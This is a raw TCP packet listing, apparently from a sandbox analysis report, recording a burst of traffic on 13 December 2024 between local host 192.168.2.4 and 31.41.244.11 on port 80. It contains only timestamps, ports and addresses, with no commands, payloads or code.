                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.016936064 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.017389059 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.017435074 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.017508984 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.017548084 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.019092083 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.019113064 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.019141912 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.019161940 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.019644976 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.019691944 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.020729065 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.020749092 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.020776987 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.020788908 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.021145105 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.021188974 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.021699905 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.021747112 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.021948099 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.021995068 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.022814989 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.022869110 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.022918940 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.022965908 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.023901939 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.023961067 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.024080992 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.024125099 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.025794029 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.025827885 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.025841951 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.025861979 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.026135921 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.026180983 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.027251959 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.027273893 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.027302980 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.027324915 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.027344942 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.027381897 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.029200077 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.029217958 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.029257059 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.030164957 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.030193090 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.030209064 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.030230045 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.030571938 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.030587912 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.030618906 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.030630112 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.032427073 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.032444954 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.032479048 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.032490015 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.032681942 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.032696962 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.032727003 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.032737970 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.034579039 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.034595013 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.034629107 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.034641027 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.035336971 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.035352945 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.035391092 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.035928965 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.035972118 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.035995960 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.036046982 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.036103010 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.036979914 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.037029982 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.037501097 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.037548065 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.038069963 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.038119078 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.038724899 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.038774967 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.039118052 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.039165974 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.039324999 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.039369106 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.040210962 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.040265083 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.040292978 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.040333033 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.042069912 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.042089939 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.042124033 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.042139053 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.042583942 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.042603970 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.042629957 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.042643070 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.044255018 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.044272900 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.044317961 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.044317961 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.046694040 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.046710014 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.046737909 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.046749115 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.046760082 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.046777010 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.047382116 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.047401905 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.047425985 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.047429085 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.047445059 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.047463894 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.050992966 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.051009893 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.051018000 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.051026106 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.051039934 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.051161051 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.051197052 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.051215887 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.051239967 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.051249027 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.051290035 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.052721024 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.052741051 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.052777052 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.052797079 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.053771973 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.053786993 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.053828955 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.055380106 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.055397034 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.055429935 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.055449963 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.055471897 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.055510044 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.057843924 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.057859898 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.057883978 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.057904005 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.057914972 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.057924032 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.057943106 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.057960987 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.058882952 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.058943033 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.059808969 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.059838057 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.059853077 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.059858084 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.059874058 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.059891939 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.061175108 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.061218977 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.196727037 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.196801901 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.197827101 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.197839022 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.197861910 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.197885990 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.197921038 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.198214054 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.198261976 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.199373007 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.199385881 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.199424028 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.199440956 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.200009108 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.200061083 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.200650930 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.200700998 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.201714993 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.201725960 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.201742887 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.201767921 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.201800108 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.202567101 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.202627897 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.202661991 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.202713013 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.202750921 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.203852892 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.203901052 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.204555988 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.204607964 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.204901934 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.204946995 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.206948042 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.206969976 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.206983089 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.206998110 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.207000017 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.207015991 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.207025051 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.207065105 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.215385914 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.215401888 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.215475082 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.215488911 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.215487003 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.215502024 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.215514898 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.215521097 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.215528965 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.215536118 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.215540886 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.215552092 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.215568066 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.215579987 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.215591908 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.215599060 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.215610027 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.215624094 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.215639114 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.215660095 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.215711117 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.215749025 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.216666937 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.216721058 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.216800928 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.216841936 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.217816114 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.217873096 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.217995882 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.218035936 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.219115019 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.219127893 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.219156981 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.219178915 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.220170021 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.220210075 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.220582962 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.220628977 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.221205950 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.221260071 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.221379995 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.221429110 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.222202063 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.222251892 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.222404957 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.222455025 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.223248959 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.223298073 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.224066019 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.224117041 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.224441051 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.224488020 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.224870920 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.224924088 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.225375891 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.225393057 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.225421906 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.225440979 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.226550102 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.226605892 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.226648092 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.226691961 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.227639914 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.227688074 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.228566885 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.228579044 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.228615046 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.229593992 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.229640007 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.229675055 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.229715109 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.230174065 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.230217934 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.230741978 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.230787039 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.230989933 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.231033087 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.231905937 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.231951952 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.231955051 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.231992006 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.232948065 CET804976331.41.244.11192.168.2.4
